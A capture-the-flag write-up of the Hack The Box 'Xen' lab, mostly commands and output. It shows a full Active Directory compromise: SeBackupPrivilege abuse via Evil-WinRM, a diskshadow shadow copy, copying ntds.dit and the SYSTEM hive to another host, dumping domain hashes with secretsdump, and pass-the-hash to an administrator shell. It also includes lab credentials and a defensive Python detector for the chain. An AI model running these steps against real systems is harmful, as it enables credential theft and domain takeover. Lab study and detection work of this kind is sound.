Basic enumeration:
*Evil-WinRM* PS C:\Users\backup-svc\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
To exploit this I followed
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
Transferring a file via evil-winrm was a pain.
I started a share on Citrix and accessed it from the DC, as the DC could not reach my Kali machine directly.
C:\ProgramData> net share df=c:\programdata /grant:everyone,FULL
net share df=c:\programdata /grant:everyone,FULL
df was shared successfully.
On the DC:
*Evil-WinRM* PS C:\Users\backup-svc\Documents> net use \\172.16.249.205\df /user:htb\mturner 4install!
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:5985 ... OK
The command completed successfully.
I need the ntds.dit file, but it cannot be copied directly while the DC is running because Active Directory keeps it open, so I take it from a Volume Shadow Copy instead. The diskshadow script hello.dsh contains the commands echoed after the `->` prompts below.
*Evil-WinRM* PS C:\Users\backup-svc\Documents> diskshadow /s hello.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 1/22/2024 10:04:23 AM
-> set context persistent nowriters
-> add volume c: alias hello
-> create
Alias hello for shadow ID {e541b08e-5a9b-4212-b92b-fc68ed009e78} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {1d5592fd-faa1-43d9-9d34-0f8a8e4d83a3} set as environment variable.
Querying all shadow copies with the shadow copy set ID {1d5592fd-faa1-43d9-9d34-0f8a8e4d83a3}
* Shadow copy ID = {e541b08e-5a9b-4212-b92b-fc68ed009e78} %hello%
- Shadow copy set: {1d5592fd-faa1-43d9-9d34-0f8a8e4d83a3} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{78d1dcbd-51bd-4ccf-907c-aa32152ad3f2}\ [C:\]
- Creation time: 1/22/2024 10:04:23 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC.htb.local
- Service machine: DC.htb.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %hello% z:
-> %hello% = {e541b08e-5a9b-4212-b92b-fc68ed009e78}
The shadow copy was successfully exposed as z:\.
The SYSTEM hive is also needed, since it holds the boot key used to decrypt the hashes in ntds.dit:
reg save hklm\system system
*Evil-WinRM* PS C:\Users\backup-svc\Documents> robocopy /b z:\windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, January 22, 2024 10:04:49 AM
Source : z:\windows\ntds\
Dest : C:\Users\backup-svc\Documents\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 z:\windows\ntds\
New File 16.0 m ntds.dit
0.0%
0.3%
100%
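From the defender's side, the chain above (a scripted diskshadow run, a `reg save` of the SYSTEM hive and a `robocopy /b` out of an exposed shadow copy, all by the same account) is very visible in process-creation telemetry. The following is an added example, not code from the writeup: it runs simple detection rules over a handful of constructed Sysmon-style Event ID 1 records (the field names `Image`, `CommandLine` and `User` and the sample values are assumptions, not log data from the box) and raises a chain alert when one user triggers all three steps.

```python
"""Flag SeBackupPrivilege-style NTDS extraction in process-creation events (added example)."""
from collections import defaultdict

# Constructed sample events modelled on Sysmon Event ID 1; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\diskshadow.exe", "CommandLine": "diskshadow /s hello.dsh", "User": r"HTB\backup-svc"},
    {"Image": r"C:\Windows\System32\reg.exe", "CommandLine": r"reg save hklm\system system", "User": r"HTB\backup-svc"},
    {"Image": r"C:\Windows\System32\Robocopy.exe", "CommandLine": r"robocopy /b z:\windows\ntds . ntds.dit", "User": r"HTB\backup-svc"},
    # Benign-looking backup job: robocopy without backup mode (/b) by a different account.
    {"Image": r"C:\Windows\System32\Robocopy.exe", "CommandLine": r"robocopy D:\data E:\backup /MIR", "User": r"HTB\svc-backup-agent"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe", "User": r"HTB\alarsson"},
]

# Registry hives whose export is credential-relevant (SYSTEM holds the boot key).
SENSITIVE_HIVES = {r"hklm\system", r"hklm\sam", r"hklm\security"}

# A "chain" is one user hitting every stage: shadow copy, hive export, NTDS copy in backup mode.
CHAIN_STAGES = {"diskshadow_script", "registry_hive_save", "robocopy_backup_mode"}


def image_name(image):
    """Return the lower-cased executable name from a full image path."""
    return image.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a list of (technique, severity) findings for a single process-creation event."""
    name = image_name(event["Image"])
    tokens = [t.lower() for t in event["CommandLine"].split()]
    flags = {t for t in tokens if t.startswith("/")}
    findings = []

    # diskshadow driven by a script file (/s) is how the shadow copy is created non-interactively.
    if name == "diskshadow.exe" and "/s" in flags:
        findings.append(("diskshadow_script", "medium"))

    # robocopy /b uses backup semantics (SeBackupPrivilege) to read files regardless of ACLs.
    if name == "robocopy.exe" and "/b" in flags:
        severity = "high" if any("ntds" in t for t in tokens) else "medium"
        findings.append(("robocopy_backup_mode", severity))

    # reg save of SYSTEM/SAM/SECURITY; normalise the long hive prefix to hklm.
    if name == "reg.exe" and len(tokens) >= 3 and tokens[1] == "save":
        hive = tokens[2].replace("hkey_local_machine", "hklm")
        if hive in SENSITIVE_HIVES:
            findings.append(("registry_hive_save", "medium"))

    return findings


def analyze(events):
    """Classify every event and correlate per user; returns findings and the users completing the chain."""
    per_user = defaultdict(set)
    all_findings = []
    for event in events:
        for technique, severity in classify(event):
            per_user[event["User"]].add(technique)
            all_findings.append((event["User"], technique, severity))
    chains = sorted(user for user, techs in per_user.items() if CHAIN_STAGES <= techs)
    return {"findings": all_findings, "chains": chains}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for user, technique, severity in result["findings"]:
        print(f"{severity:6} {technique:22} {user}")
    for user in result["chains"]:
        print(f"ALERT  ntds extraction chain completed by {user}")
```

The per-event rules are cheap and noisy on their own (backup software legitimately uses `robocopy /b`), which is why the correlation step matters: one principal performing all three stages in a short window is the signal worth paging on. Pairing it with logon events that list SeBackupPrivilege among the assigned special privileges narrows it further to accounts that actually hold the right.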
Copied SYSTEM and ntds.dit to Citrix over the share:
copy ntds.dit \\172.16.249.205\df\ntds.dit
copy system \\172.16.249.205\df\system
meterpreter > download system
[*] Downloading: system -> /home/nakul/Desktop/ctf/htb-EndGames/Xen/system
[*] Downloaded 1.00 MiB of 12.75 MiB (7.84%): system -> /home/nakul/Desktop/ctf/htb-EndGames/Xen/system
[*] Downloaded 2.00 MiB of 12.75 MiB (15.68%): system -> /home/nakul/Desktop/ctf/htb-EndGames/Xen/system
[*] Downloaded 3.00 MiB of 12.75 MiB (23.52%): system -> /home/nakul/D
Dumped the hashes with secretsdump:
➜ Xen impacket-secretsdump -ntds ntds.dit -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x6e398137ec7f2e204671dad7c778509f
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 4a62a0ac1475b54add921ac8c1b72e31
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:5e507509602e1b651759527b87b6c347:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3791ca8d70c9e1d2d2c7c5b5c7c253e8:::
CITRIX$:1103:aad3b435b51404eeaad3b435b51404ee:fd981d0c915932bb3ddf38b415c49121:::
htb.local\alarsson:1104:aad3b435b51404eeaad3b435b51404ee:92a44f1aa6259c55f9f514fabae5cc3f:::
htb.local\jmendes:1106:aad3b435b51404eeaad3b435b51404ee:10d0c05f7d958955f0eaf1479b5124a0:::
htb.local\pmorgan:1107:aad3b435b51404eeaad3b435b51404ee:8618ba932416a7404a854b250bf28577:::
htb.local\awardel:1108:aad3b435b51404eeaad3b435b51404ee:270e4d446437f4383b092b42a9f88f0a:::
Root, by passing the Administrator NT hash:
➜ Xen proxychains impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be administrator@172.16.249.200
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:49666 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator
C:\>type C:\users\administrator\Desktop\flag.txt
XEN{d3r1v471v3...1n_4dm1n}
Finally.